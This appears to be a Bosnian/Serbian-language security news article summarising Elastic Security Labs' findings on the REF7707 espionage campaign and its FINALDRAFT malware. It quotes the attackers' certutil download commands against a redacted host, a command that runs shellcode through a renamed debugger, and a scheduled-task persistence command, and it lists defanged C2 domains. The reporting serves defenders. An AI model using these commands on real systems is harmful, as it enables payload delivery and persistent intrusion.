Elastic Security Labs je nedavno predstavio sofisticiranu hakersku kampanju, nazvanu “REF7707”, koja cilja i Windows i Linux sisteme koristeći nove porodice malvera, uključujući FINALDRAFT, GUIDLOADER i PATHLOADER.
Ova kampanja je bila značajna po svojoj naprednoj taktici i slaboj operativnoj sigurnosti, što je dovelo do izlaganja dodatne infrastrukture u vlasništvu protivnika.
REF7707 kampanja je prvi put identifikovana krajem novembra 2024. godine, kada je Elastic Security Labs uočio grupu upozorenja o ponašanju krajnje tačke u Ministarstvu spoljnih poslova jedne južnoameričke zemlje.
Istraga je otkrila opsežnu kampanju s novim malicioznim softverom, sofisticiranim ciljanjem i zrelom radnom kadencom.
Dok su stručnjaci za sigurnost u Elastic Security Labs-u primijetili da su, uprkos tome što su pokazali visoku tehničku kompetenciju u nekim oblastima, napadači napravili taktičke previde koji su razotkrili pretprodukcijske uzorke malicioznog softvera i infrastrukturu.
Tok izvršenja
Primarni lanac izvršavanja započeo je upotrebom Microsoftove certutilaplikacije za preuzimanje datoteka sa udaljenog servera. Ovo je uključivalo komande kao što su:-
certutil -urlcache -split -f https://[redacted]/fontdrvhost.exe C:\ProgramData
certutil -urlcache -split -f https://[redacted]/fontdrvhost.rar C:\ProgramDataOve datoteke su preuzete pomoću dodatka Remote Shell za Windows Remote Management ( WinrsHost.exe), što ukazuje da su napadači imali važeće mrežne akreditive za bočno kretanje.
.webp)
FINALDRAFT je ključna komponenta REF7707 intrusion seta. Ima i Windows i Linux varijante i koristi neuobičajenu taktiku LOLBin (Living Off The Land Binary) zloupotrebljavajući Windows-potpisan program za otklanjanje grešaka CDB.exe, preimenovan u fontdrvhost.exe.
Ovaj binarni program izvršava maliciozni shellcode isporučen putem naoružane config.inidatoteke.
C:\ProgramData\fontdrvhost.exe -cf C:\ProgramData\config.ini -o C:\ProgramData
.webp)
FINALDRAFT ubrizgava shellcode u procese poput mspaint.exeili conhost.exeako nije naveden ciljni parametar.
Postojanost je postignuta korištenjem planiranog zadatka koji se fontdrvhost.exesvake minute pozivao kao SISTEM:-
schtasks /create /RL HIGHEST /F /tn "\Microsoft\Windows\AppID\EPolicyManager\" /tr "C:\ProgramData\fontdrvhost.exe -cf C:\ProgramData\config.ini -o C:\ProgramData" /sc MINUTE /mo 1 /RU SYSTEMFINALDRAFT uspostavlja komandu i kontrolu koristeći Microsoftov Graph API, stapajući se sa legitimnim organizacionim saobraćajem i izbegavajući detekciju zasnovanu na mreži.
.webp)
Kampanja u velikoj mjeri koristi usluge oblaka i treće strane za komandu i kontrolu. U uzorcima malicioznog softvera identifikovani su domeni poput support.vmphere[.]comi .update.hobiter[.]com
Ovi domeni su dio infrastrukture u vlasništvu protivnika. U REF7707 kampanji napadači koriste novi maliciozni softver i iskorištavaju legitimne alate kako bi izbjegli otkrivanje.
Upotreba FINALDRAFT-a na Windows i Linux platformama pokazuje potrebu za robusnim mjerama sigurnosti na više platformi .
Izvor: CyberSecurityNews